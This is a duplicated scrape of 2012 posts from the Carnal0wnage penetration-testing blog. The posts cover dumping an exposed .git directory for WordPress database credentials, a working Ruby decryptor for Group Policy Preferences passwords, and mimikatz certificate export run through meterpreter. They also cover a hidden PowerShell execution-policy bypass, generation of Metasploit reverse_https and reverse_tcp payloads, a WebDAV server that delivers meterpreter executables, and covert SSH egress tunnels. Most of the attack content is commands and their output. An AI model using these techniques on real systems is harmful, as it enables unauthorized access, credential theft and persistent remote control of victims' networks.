Initialized empty Git repository in /home/user/pentest/DVCS-Pillage/www.site.com/.git/ Getting refs/heads/master Getting objects/ef/72174d7a5d893XXXXXXXXXXXXXXXXXXXX Getting index Getting .gitignore curl: (22) The requested URL returned error: 404 About to make 245 requests to www.site.com; This could take a while Do you want to continue? (y/n)y Getting objects/01/f0d130adf04d66XXXXXXXXXXXXXXXX9e4ddb41 Getting objects/49/403ecc2d8a343da9XXXXXXXXXXXXXXX3f094d9 Getting objects/d3/1195ab0e695f8b89XXXXXXXXXXXXXXXXXa3af5 Getting objects/f9/b926f07XXXXXXXXXXXXXXXXXXXX567cf438c6a Getting objects/57/78a12e2edebXXXXXXXXXXXXXXXXXXX3f3a0e8d ---snip--- trying to checkout files error: git checkout-index: unable to read sha1 file of wp-register.php (caad4f2b21c37bXXXXXXXXXXXXXXX81c7949ec4f74e) #### Potentially Interesting Files #### wp-admin/export.php - [CHECKED OUT] wp-admin/includes/export.php - [CHECKED OUT] wp-admin/setup-config.php - [CHECKED OUT] wp-config-sample.php - [CHECKED OUT] wp-config.php - [CHECKED OUT] wp-settings.php - [CHECKED OUT]

anything useful in there?

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information b y * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'site_wordpress'); /** MySQL database username */ define('DB_USER', 'site_wp'); /** MySQL database password */ define('DB_PASSWORD', 'XXXXXXXX');
another way to turn a low to pwned :-)
Tags: nbsp git php ron adam pillage wget index-files Pentesting

October 19, 2012
6:00
Group Policy Preferences and Getting Your Domain 0wned
» ‎ carnal0wnage.attackresearch.com

So i put this link out on twitter but forgot to put it on the blog.

I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

So here are the slides:

Exploiting Group Policy Preferences from chrisgates

Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Metasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gpp

PowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:

require 'rubygems' require 'openssl' require 'base64' encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" def decrypt(encrypted_data) padding = "=" * (4 - (encrypted_data.length % 4)) epassword = "#{encrypted_data}#{padding}" decoded = Base64.decode64(epassword) key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") aes.decrypt aes.key = key plaintext = aes.update(decoded) plaintext << aes.final pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion return pass end blah = decrypt(encrypted_data) puts blah
In Action:

user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!

Tags:

6:00
Group Policy Preferences and Getting Your Domain 0wned
» ‎ Carnal0wnage

So i put this link out on twitter but forgot to put it on the blog.

I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

So here are the slides:

Exploiting Group Policy Preferences from chrisgates

Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Metasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gpp

PowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:

require 'rubygems' require 'openssl' require 'base64' encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" def decrypt(encrypted_data) padding = "=" * (4 - (encrypted_data.length % 4)) epassword = "#{encrypted_data}#{padding}" decoded = Base64.decode64(epassword) key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") aes.decrypt aes.key = key plaintext = aes.update(decoded) plaintext << aes.final pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion return pass end blah = decrypt(encrypted_data) puts blah
In Action:

user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!

Tags: nbsp group policy pentest encrypted-data x05 Pentesting

October 17, 2012
6:00
Wigle Wifi Wardriving meets Google Earth for Neat Wifi Maps
» ‎ carnal0wnage.attackresearch.com

I needed to make a map the access points for a client. Since i cant show that map, i made another using the same technique.
First take your handy dandy Android device and install Wigle Wifi Wardriving.
It uses the internal GPS and wifi to log access points, their security level and their GPS Position.
looks like this (yup i stole these)
List of access points
Also makes a cute map on your phone
once you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.
With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.
All Access Points
Open Access Points
WEP Encrypted Access Points
That's it.
-CG

Tags:

6:00
Wigle Wifi Wardriving meets Google Earth for Neat Wifi Maps
» ‎ Carnal0wnage

I needed to make a map the access points for a client. Since i cant show that map, i made another using the same technique.
First take your handy dandy Android device and install Wigle Wifi Wardriving.
It uses the internal GPS and wifi to log access points, their security level and their GPS Position.
looks like this (yup i stole these)
List of access points
Also makes a cute map on your phone
once you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.
With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.
All Access Points
Open Access Points
WEP Encrypted Access Points
That's it.
-CG

Tags: nbsp wifi access internal-gps gps-position stolen-photo Wireless

October 15, 2012
7:00
More with Mimikatz (Crypto Module)
» ‎ carnal0wnage.attackresearch.com
So we all know that mimikatz dumps hashes and passwords!!! from memory which is the shiznazzle.

But, now that its working in memory, you can do lots more with it. Below are the various modules
The Crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon. the crypto module helps you do this.
Things you are probably intersted in are:
crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates
to identify fun stuff that you want for your own from the host.
then crypto::exportKeys and crypto::exportCertifcates
to take that stuff home.
kinda looks like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'Process 9904 created. Channel 20 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER' My Root Trust CA TrustedPublisher Disallowed AuthRoot TrustedPeople ADDRESSBOOK mimikatz(commandline) # exit

execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit' Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit

execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My - MACHINENAME Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK mimikatz(commandline) # exit

once exported you download the .pfx and .der files
Tags:

7:00
More with Mimikatz (Crypto Module)
» ‎ Carnal0wnage
So we all know that mimikatz dumps hashes and passwords!!! from memory which is the shiznazzle.

But, now that its working in memory, you can do lots more with it. Below are the various modules
The Crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon. the crypto module helps you do this.
Things you are probably intersted in are:
crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates
to identify fun stuff that you want for your own from the host.
then crypto::exportKeys and crypto::exportCertifcates
to take that stuff home.
kinda looks like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'Process 9904 created. Channel 20 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER' My Root Trust CA TrustedPublisher Disallowed AuthRoot TrustedPeople ADDRESSBOOK mimikatz(commandline) # exit

execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit' Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit

execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My - MACHINENAME Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK mimikatz(commandline) # exit

once exported you download the .pfx and .der files
Tags: nbsp crypto mimikatz minesweeper current-user interesting-things Pentesting

October 11, 2012
6:09
Run a PowerShell module in Meterpreter
» ‎ carnal0wnage.attackresearch.com

I don't know why but powershell and meterpeter just dont play nice.

Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.

In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either. If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)

so, you can run powershell scripts via bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].

C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1

Example:

meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400

carlos perez mentioned at Derbycon you can also do:

on linux download this script https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py or if on windows you can download the EXE https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.exe

you can use it to encode a script and then run it like so:

msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.225[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400
msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...
meterpreter > shell Process 3416 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\carlos\Desktop>powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=hello world
C:\Users\carlos\Desktop>
Tags:

6:09
Run a PowerShell module in Meterpreter
» ‎ Carnal0wnage

I don't know why but powershell and meterpeter just dont play nice.

Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.

In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either. If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)

so, you can run powershell scripts via bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].

C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1

Example:

meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400

carlos perez mentioned at Derbycon you can also do:

on linux download this script https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py or if on windows you can download the EXE https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.exe

you can use it to encode a script and then run it like so:

msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.225[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400
msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...
meterpreter > shell Process 3416 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\carlos\Desktop>powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=hello world
C:\Users\carlos\Desktop>
Tags: microsoft-windows-version blah-blah shell-ness powershell

October 08, 2012
6:00
Metasploit and PowerShell payloads
» ‎ carnal0wnage.attackresearch.com

Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.

msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >

Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

PowerShell version

PowerShell .net version

Tags:

6:00
Metasploit and PowerShell payloads
» ‎ Carnal0wnage

Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.

msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >

Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

PowerShell version

PowerShell .net version

Tags: nbsp powershell payload metasploit payloads

October 03, 2012
22:17
DerbyCon Media
» ‎ carnal0wnage.attackresearch.com

mubix and I's talk:

DIRTY LITTLE SECRETS THEY DIDN'T TEACH YOU IN PENTEST CLASS - PART 2 (VIDEO)

infosecmafia and I's talk
Pentesting from a Hot Tub Time Machine

Also did an interview with Darren of Hak5

here is the link. the embed is being grumpy

http://revision3.com/hak5/derbycon-2012

pic of the shirts i had made for Derbycon

Tags:

22:17
DerbyCon Media
» ‎ Carnal0wnage

mubix and I's talk:

DIRTY LITTLE SECRETS THEY DIDN'T TEACH YOU IN PENTEST CLASS - PART 2 (VIDEO)

infosecmafia and I's talk
Pentesting from a Hot Tub Time Machine

Also did an interview with Darren of Hak5

here is the link. the embed is being grumpy

http://revision3.com/hak5/derbycon-2012

pic of the shirts i had made for Derbycon

Tags: derbycon mubix media darren dirty-little-secrets tub-time little-secrets

September 07, 2012
6:00
Pwn Plug Elite Action Shots
» ‎ carnal0wnage.attackresearch.com
We've been able to use the Pwn Plug on a few LARES Red Team tests.

We've mostly utilized the 3G out of band functionality, this allows us to more easily bridge that gap between physical and electronic attack. Either way its been great and definitely a value add for us.

Pwn Plug Elite gives you several methods to egress a network
http://pwnieexpress.com/pages/remote-access

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:
- SSH over any TCP port
- SSH over HTTP requests (appears as standard HTTP traffic)
- SSH over SSL (appears as HTTPS)
- SSH over DNS queries (appears as DNS traffic)
- SSH over ICMP (appears as outbound pings)
- SSH over ICMP (appears as outbound pings)
- SSH Egress Buster (top 10 common egress ports)
- Out-of-band SSH over 3G/GSM cellular (Elite models)
yak yak, lets see some action shots!

First some shots of the web interface to set up the various tunnels (taken from the web site)

Its pretty straightforward and the documentation the pwnie express guys provide will get you up and running with whatever tunnel method you choose.

ok now action shots.

Pwn Plug hanging out in an empty cube hooked up to the network

With the 3G stick plugged in. sorry kinda blurry, couldnt go back and take another ;-/

Final placement behind some boxes where it hung out for a few days.

Othere useful reading/resources
http://pwnieexpress.com/blogs/news/6156894-using-at-t-dataconnect-sim-cards-with-pwn-plug-elite
http://pwnieexpress.com/blogs/news/6156896-using-t-mobile-4g-pay-by-the-day-with-pwn-plug-elite

http://www.securitygeneration.com/security/pwn-plug-command-execution-using-usb-sticks/
http://www.securitygeneration.com/security/reverse-ssh-over-tor-on-the-pwnie-express/
http://www.securitygeneration.com/security/pwniescripts-for-pwnie-express/
Tags:

6:00
Pwn Plug Elite Action Shots
» ‎ Carnal0wnage
We've been able to use the Pwn Plug on a few LARES Red Team tests.

We've mostly utilized the 3G out of band functionality, this allows us to more easily bridge that gap between physical and electronic attack. Either way its been great and definitely a value add for us.

Pwn Plug Elite gives you several methods to egress a network
http://pwnieexpress.com/pages/remote-access

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:
- SSH over any TCP port
- SSH over HTTP requests (appears as standard HTTP traffic)
- SSH over SSL (appears as HTTPS)
- SSH over DNS queries (appears as DNS traffic)
- SSH over ICMP (appears as outbound pings)
- SSH over ICMP (appears as outbound pings)
- SSH Egress Buster (top 10 common egress ports)
- Out-of-band SSH over 3G/GSM cellular (Elite models)
yak yak, lets see some action shots!

First some shots of the web interface to set up the various tunnels (taken from the web site)

Its pretty straightforward and the documentation the pwnie express guys provide will get you up and running with whatever tunnel method you choose.

ok now action shots.

Pwn Plug hanging out in an empty cube hooked up to the network

With the 3G stick plugged in. sorry kinda blurry, couldnt go back and take another ;-/

Final placement behind some boxes where it hung out for a few days.

Othere useful reading/resources
http://pwnieexpress.com/blogs/news/6156894-using-at-t-dataconnect-sim-cards-with-pwn-plug-elite
http://pwnieexpress.com/blogs/news/6156896-using-t-mobile-4g-pay-by-the-day-with-pwn-plug-elite

http://www.securitygeneration.com/security/pwn-plug-command-execution-using-usb-sticks/
http://www.securitygeneration.com/security/reverse-ssh-over-tor-on-the-pwnie-express/
http://www.securitygeneration.com/security/pwniescripts-for-pwnie-express/
Tags: plug pwn ssh elite-models dns-queries sim-cards Pentesting

August 07, 2012
8:28
Lotus Domino Scanner
» ‎ carnal0wnage.attackresearch.com
occasionally I run into Lotus Domino stuff on tests.

William Dawson (@bill_e_ghote) did a talk at Bsides LV 2012 and skytalks on Lotus Domino hashes

Link --> http://youtu.be/vfUqZo1Hryg

its worth a listen if you need some background info.

in 2010 i dropped a lotus domino version module
http://carnal0wnage.attackresearch.com/2010/05/metasploit-lotus-domino-version-scanner.html

The module is in the trunk, you can read the post but in my experience newer version of Lotus Domino dont actually advertise that they are lotus domino in the banner, thus you need a way to identify these and once identified figure out current version so you can see if there are any exploits for it.

One of the other things Bill mentions is locating these vulnerable pages. He uses google dorks, which is useful as long as the site is indexed. While not in the trunk, awhile back i had a bunch of domino servers on a pentest. I ended up taking all the domino scanners i could find and combing those wordlists into one wordlist and writing a metasploit module to search for those URLs. The key was that we wanted to see which ones were open to the world and which ones require authentication (correct behavior) and any the forwarded you to somewhere else (probably because you are on 80 and the site requires 443).

In my github repo is the module and wordlist

module is here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/lotus_domino_scanner.rb

wordlist is here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/data/wordlists/lotus_domino_bases.txt

if i'm missing some urls please let me know so i can update the list.

looks like this when run
```
msf  auxiliary(lotus_domino_scanner) > run

[*] Scanning 192.168.1.4:443
[*] Bases with Anonymous Access:
download/filesets/l_LOTUS_SCRIPT.inf
download/filesets/l_SEARCH.inf
download/filesets/n_LOTUS_SCRIPT.inf
download/filesets/n_SEARCH.inf
events4.nsf
help/lsxlc.nsf
homepage.nsf
iNotes/Forms6.nsf
iNotes/Forms7.nsf
mtatbls.nsf


[*] Bases Requiring Authentication:
admin4.nsf
agentrunner.nsf
agentrunner.nsf
Bookmark.nsf
certlog.nsf
certsrv.nsf
certsrv.nsf
cldbdir.nsf
dbdirman.nsf
ddm.nsf
doladmin.nsf
domadmin.nsf
domcfg.nsf
domcfg.nsf/?open
log.nsf
log.nsf
mail1.box
mail2.box
names.nsf
names.nsf
names.nsf/$Users
schema.nsf
statrep.nsf
statrep.nsf
statrep.nsf?ReadEntries
webadmin.nsf
webadmin.nsf


[*] Forward:

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Tags:

8:28
Lotus Domino Scanner
» ‎ Carnal0wnage
occasionally I run into Lotus Domino stuff on tests.

William Dawson (@bill_e_ghote) did a talk at Bsides LV 2012 and skytalks on Lotus Domino hashes

Link --> http://youtu.be/vfUqZo1Hryg

its worth a listen if you need some background info.

in 2010 i dropped a lotus domino version module
http://carnal0wnage.attackresearch.com/2010/05/metasploit-lotus-domino-version-scanner.html

The module is in the trunk, you can read the post but in my experience newer version of Lotus Domino dont actually advertise that they are lotus domino in the banner, thus you need a way to identify these and once identified figure out current version so you can see if there are any exploits for it.

One of the other things Bill mentions is locating these vulnerable pages. He uses google dorks, which is useful as long as the site is indexed. While not in the trunk, awhile back i had a bunch of domino servers on a pentest. I ended up taking all the domino scanners i could find and combing those wordlists into one wordlist and writing a metasploit module to search for those URLs. The key was that we wanted to see which ones were open to the world and which ones require authentication (correct behavior) and any the forwarded you to somewhere else (probably because you are on 80 and the site requires 443).

In my github repo is the module and wordlist

module is here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/lotus_domino_scanner.rb

wordlist is here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/data/wordlists/lotus_domino_bases.txt

if i'm missing some urls please let me know so i can update the list.

looks like this when run
```
msf  auxiliary(lotus_domino_scanner) > run

[*] Scanning 192.168.1.4:443
[*] Bases with Anonymous Access:
download/filesets/l_LOTUS_SCRIPT.inf
download/filesets/l_SEARCH.inf
download/filesets/n_LOTUS_SCRIPT.inf
download/filesets/n_SEARCH.inf
events4.nsf
help/lsxlc.nsf
homepage.nsf
iNotes/Forms6.nsf
iNotes/Forms7.nsf
mtatbls.nsf


[*] Bases Requiring Authentication:
admin4.nsf
agentrunner.nsf
agentrunner.nsf
Bookmark.nsf
certlog.nsf
certsrv.nsf
certsrv.nsf
cldbdir.nsf
dbdirman.nsf
ddm.nsf
doladmin.nsf
domadmin.nsf
domcfg.nsf
domcfg.nsf/?open
log.nsf
log.nsf
mail1.box
mail2.box
names.nsf
names.nsf
names.nsf/$Users
schema.nsf
statrep.nsf
statrep.nsf
statrep.nsf?ReadEntries
webadmin.nsf
webadmin.nsf


[*] Forward:

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Tags: nbsp lotus domino domino-hasheslink domino-scanner dawson bill william lotus-domino domino-servers lotus-script

June 06, 2012

Permalink for 'WebDAV Server to Download Custom Executable or MSF Generated Executables'

6:00

WebDAV Server to Download Custom Executable or MSF Generated Executables

» ‎ carnal0wnage.attackresearch.com

Metasploit comes with dllhijacker module

The current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a webdav server has been a request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.

So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).

The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.


msf  exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
   LOCALFILE   myexe.exe        yes       The filename to serve up
   LOCALROOT   /tmp/            yes       The local file path
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH     /                yes       The URI to use (do not change).


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>  windows/meterpreter/reverse_tcp
msf  exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST =>  192.168.26.129
smsf  exploit(webdav_file_server) > set LPORT 5555
LPORT =>  5555

msf  exploit(webdav_file_server) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.26.129:80/
[*] Server started.

msf  exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload

**Manually execute the exe**


[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012

Now if you want to serve a local exe


msf  exploit(webdav_file_server) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf  exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE

